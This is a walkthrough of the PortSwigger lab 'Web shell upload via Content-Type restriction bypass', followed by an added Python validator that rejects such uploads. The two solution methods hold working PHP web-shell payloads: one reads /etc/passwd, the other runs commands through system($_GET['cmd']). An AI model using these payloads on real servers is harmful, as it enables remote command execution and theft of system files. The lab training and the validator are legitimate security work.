Lab: Web shell upload via Content-Type restriction bypass

Aditya Uniyal

Solved:

Method 1:

  1. Set the Burp Proxy HTTP history filter to show image files.

  2. Upload an image file, retrieve the POST request from the history and send it to Repeater.

  3. Now, in the browser, click to go back to "My Account".

  4. Retrieve the GET request and send it to Repeater as well.

  5. In the POST request, change the filename and its extension to "test.php"; it is in the Content-Disposition header of the file part.

  6. Remove the file's binary content (the text shown in red).

  7. Type this PHP in its place: <?php echo file_get_contents('/etc/passwd'); ?> to check whether the payload works. Or simply put /home/carlos/secret in place of /etc/passwd and send the request in Repeater.

  8. Switch to the GET request tab, change the filename to the exploit's file name, i.e. "test.php", and send the request.

  9. The response contains a piece of text; copy it, go to the website's home page and submit it as the solution.

Method 2:

  1. Set the Burp Proxy filter to show image files.

  2. Create a shell.php file beforehand containing: <?php system($_GET['cmd']); ?>

  3. Upload it and send the request to Repeater.

  4. Go back to the My Account page and open the image in a new tab.

  5. In the URL, append ?cmd=cat+/home/carlos/secret to print the secret code. If it is shown, submit it as the solution; otherwise go back to Repeater, to the second request (the GET request for the shell), and add the same parameter there.
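Both methods work because the server accepts whatever Content-Type the client declares for the upload. As a defensive counterpart, here is an added example of a server-side upload validator (code written for this write-up, not part of the lab or of PortSwigger's code) that ignores the client-supplied Content-Type entirely, enforces an extension allowlist, checks that the body's magic bytes match that extension, and stores the file under a random name. The allowlist, the field names and the sample bodies used in the test are constructed assumptions.

```python
"""Added example: validate an avatar upload without trusting the client.

The Content-Type header of a multipart file part is set by the client, so
a check that only compares it against image/jpeg or image/png is the weak
control that a Burp Repeater edit defeats.  This validator never reads it.
"""
import os
import secrets

# Constructed allowlist of avatar extensions; "jpeg" is normalised to "jpg".
ALLOWED_EXTENSIONS = {"png", "jpg", "gif"}
EXTENSION_ALIASES = {"jpeg": "jpg"}

# Leading bytes (magic numbers) of each allowed image format.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def sniff_image_type(data):
    """Return the image type implied by the body's own bytes, or None."""
    for ext, prefixes in MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return ext
    return None


def validate_upload(filename, claimed_content_type, data):
    """Accept or reject an upload; returns {"ok", "reason", "stored_as"}.

    claimed_content_type is only echoed into the reason string for logging.
    It never influences the decision because the client controls it.
    """
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    # Exactly one extension, so a name like "a.php.png" never reaches disk.
    if len(parts) != 2 or not parts[0]:
        return {"ok": False, "reason": "filename must be name.ext", "stored_as": None}
    ext = EXTENSION_ALIASES.get(parts[1], parts[1])
    if ext not in ALLOWED_EXTENSIONS:
        return {"ok": False, "reason": f"extension .{parts[1]} not allowed", "stored_as": None}
    # The body must really start like the image type the extension claims.
    sniffed = sniff_image_type(data)
    if sniffed != ext:
        return {
            "ok": False,
            "reason": f"body is not a {ext} image (client claimed {claimed_content_type})",
            "stored_as": None,
        }
    # A magic-number prefix only vouches for the first bytes.  A production
    # handler should also re-encode the image (e.g. with Pillow) and serve
    # uploads from a directory in which the web server executes nothing.
    # Never reuse the client's filename on disk: a random name with the
    # verified extension removes any remaining control over the stored path.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return {"ok": True, "reason": "accepted", "stored_as": stored}


if __name__ == "__main__":
    # Constructed sample bodies: a minimal PNG header and a PHP fragment.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    php = b"<?php echo 'hello'; ?>"
    print(validate_upload("test.php", "image/jpeg", php))   # rejected: extension
    print(validate_upload("avatar.png", "image/png", php))  # rejected: magic bytes
    print(validate_upload("avatar.png", "text/plain", png))  # accepted: header ignored
```

The third call in the usage block is the instructive one: a genuine PNG is accepted even though the client declared text/plain, while a PHP body is rejected whatever Content-Type it declares, so the decision depends only on evidence the server itself verifies.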
